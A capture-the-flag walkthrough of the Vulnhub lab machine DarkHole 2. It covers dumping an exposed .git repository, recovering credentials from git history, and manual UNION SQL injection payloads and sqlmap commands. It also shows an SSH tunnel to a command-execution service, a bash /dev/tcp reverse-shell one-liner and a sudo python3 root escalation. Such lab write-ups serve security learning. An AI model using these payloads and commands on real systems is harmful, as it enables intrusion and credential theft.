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DarkHole_2 Walkthrough – Vulnhub – Writeup

darkhole_2 walkthrough writeup security vulnhub

DarkHole 2 is an easy to medium machine from Vulnhub. However, the author has rated this as a hard machine. So, this difficulty depends on your experience with CTF machines. For me, it took less than 1 hour to get to the root. Furthermore, I have tested this machine on VMWare. “DarkHole_2 Walkthrough – Vulnhub – Writeup”

In this walkthrough, I will show alternative ways rather than just getting to the root. So, make sure you do not skip any portion of the post. Likewise, I will also ask for inline feedback. So, please if you can, disable your ad blocker.
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Link to the machine:,740/

Identify the target

Firstly, I had to get the IP address of the target. The DHCP is enabled and VMWare assigns an IP address to the machine.

sudo netdiscover -r
image 40
Netdiscover shows the IP address as

Identify the open ports

Next, I scanned the open ports to get the information of exposed services.

nmap -v -T4 -sC -sV -p- -oN nmap.log
image 41
Nmap scan result shows a git repository

Here, we got a “/.git” path on the webserver. From this, we can get the source code. I will show you two ways to do such a thing. However, let’s start by visiting the webserver.

Enumerate the webserver

On the default page, we see a login link that doesn’t suffer from SQL injection.

image 42
The login page

Since we can generate the source code, we can check the implementation. For my first method, I won’t use any specific tool and on the second, I will use the GitTools.

Using wget and git

We can download the git repository as follows.

wget -r

This will create a directory having the name as the IP address. Inside, the directory, it has the files downloaded recursively including the “.git”.

image 43
The directory structure of the webserver

Now that we have the .git directory, I can clone this as follows.

git clone . webapp

This will create a git repository “webapp” where we can perform all git operations.

image 44
Clone repository

On the login.php page, we see logic for login.

image 45
The source code of login.php

As we can see above, the highlighted section is sanitizing the input. Thus, we cannot perform SQL injection. However, when I checked the git logs, we will see credentials in the same place.

git log
image 46
git log history

From the git logs, we see on the second commit the author has added the default credentials. So, let’s switch the HEAD to that commit.

git checkout a4d9
cat login.php
image 47
Credentials on login.php

Now, we see the credentials of the user with ID 1. We can easily log into the web app now.

image 49
Dashboard after logging in

Hence, in this way, we get access to the dashboard. Now, let’s do the same thing using GitTools.

Using GitTools

Firstly, we have to clone the GitTools repo on our local machine.

Repo Link:

There are three tools of which I am going to use two of them.

~/GitTools/Dumper/ gitdump

The above command will dump the .git directory to a directory gitdump.

image 50
.git is dumped
~/GitTools/Extractor/ . .

Similarly, the above command will extract the source code and organize it as per the commits as shown below.

image 51
Extracted source code
In this way, we can get the source code from the .git directory.
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The remaining is the same as the previous. The only difference is it dumps everything in separate directories. Now, let’s move further to the SQL injection.

SQL Injection

On the dashboard URL, we see a GET parameter “id”. When we change its value, we can observe changes in the page as well.

image 52
Updated to “id=NULL”

The values disappear because of course there won’t be a user with an ID null. Hence, this gives us an idea that there are at least 5 columns on the table “users” including “id”. Let’s check if this suffers an SQL injection by replacing the value with a single quote.

image 53
The blank page shows the possibility of SQL injection

As soon as I used the apostrophe, we see a blank page suggesting an error. This further hints at the possibility of SQL injection. Let’s try both the manual way and the “SQLMAP” way.

Extract information manually

To extract information, we mostly use the UNION query. However, to perform the UNION operation, we need to identify the number of columns on the table. Here, we have a rough idea of the least number of columns. But we can be certain by using ORDER BY in the query.

id=1' ORDER BY 5 -- -
id=1' ORDER BY 6 -- -
id=1' ORDER BY 7 -- - 
# This gives an error suggesting the 7th column doesn't exist
image 54
ORDER BY 6 doesn’t give any error
image 55
ORDER BY 7 gives an error

Therefore, we can say that there isn’t a 7th column because we got an error. So, let’s use a UNION query as follows.

id=NULL' UNION ALL SELECT 1,2,3,4,5,6 -- -
image 56
The values as replaced by the SELECT query joined using UNION

Here, we see that numbers 2,3,5 and 6 are reflected in the UI. This means that we can use columns 2,3,5 and 6 to dump data. Firstly, let’s identify the database names. However, we know the database of the machine from the config.php file in the source code. The database name is “darkhole_2”. But, let’s find out this way too.

NULL' UNION ALL SELECT 1,GROUP_CONCAT(schema_name),3,4,5,6 FROM information_schema.schemata -- -
image 58
Schema list

To show all values, we have to edit the form field. However, we can look at the source of the page for a better view.

image 59
Source of the page

In this way, we can also list the tables from the database.

id=NULL' UNION ALL SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema='darkhole_2'-- -
image 60
Tables of the database

We can see that there is another table SSH. Now, we have to find the column names of the table.

id=NULL' UNION ALL SELECT 1,GROUP_CONCAT(column_name),3,4,5,6 FROM information_schema.columns WHERE table_name='ssh'-- -
image 61
Columns of ssh

Now, we can dump the password and the username.

id=NULL' UNION ALL SELECT 1,user,pass,4,5,6 FROM ssh-- -
image 63
Credentials of the user jehad
This is how I get dump data manually.
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Next, we can log into the server with the credentials.

image 64
SSH shell of the user jehad

Now, let’s do this using the sqlmap tool.

Using sqlmap

Firstly, we have to capture the cookie using burp suite or firefox developers tools.

image 65
A cookie from the network tab of the developer tools

Then, we can use sqlmap as follows.

sqlmap -u '' --cookie='PHPSESSID=fpsucd0u7jvc792oheut09dhsg' --dbms=mysql --current-db
image 66
SQL injection using sqlmap
sqlmap -u '' --cookie='PHPSESSID=fpsucd0u7jvc792oheut09dhsg' --dbms=mysql --current-db -D darkhole_2 --tables
image 67
Tables of darkhole_2
sqlmap -u '' --cookie='PHPSESSID=fpsucd0u7jvc792oheut09dhsg' --dbms=mysql --current-db -D darkhole_2 -T ssh --dump
image 68
Rows of ssh

In this way, we can quickly dump the database using sqlmap. Now, let’s move further to our SSH shell.

Switch to losy

We see a cronjob that is run as the user losy.

cat /etc/crontab
image 69
Cron job as losy

Here, we can see that a web server is running at port 9999. When we see the content of the source code, we see that this allows remote command execution.

image 70
Source code of the server

Thus, we can tunnel port 9999 using SSH as follows.

ssh -L 9999: [email protected]

Then, I could visit for the RCE.

image 71
RCE as the user losy

Now, we can get a reverse shell as the user losy. For that, I am listening on port 9001.

nc -nlvp 9001

The following payload would give me a reverse shell.

bash -c 'bash -i >& /dev/tcp/ 0>&1'

Next, I had to encode this in URL-encoded format.


This gave me the shell.

image 72
Reverse shell as the user losy

Lastly, I upgraded the shell.

Upgrade to an intelligent reverse shell

Root privilege escalation

The root privilege escalation part is as easy as it could get. On the .bash_history file, we see a password intentionally put.

image 73
Bash history has a password of the user losy

Then, I checked the sudo permissions of the user.

image 74
Sudo permissions of the user losy

This is an easy case of RPE.


sudo python3 -c 'import os; os.system("/bin/bash")'
image 75
The root shell


As I said earlier, the root part is too easy for a hard machine. Please let me know in the inline comment. Overall, the machine is good.
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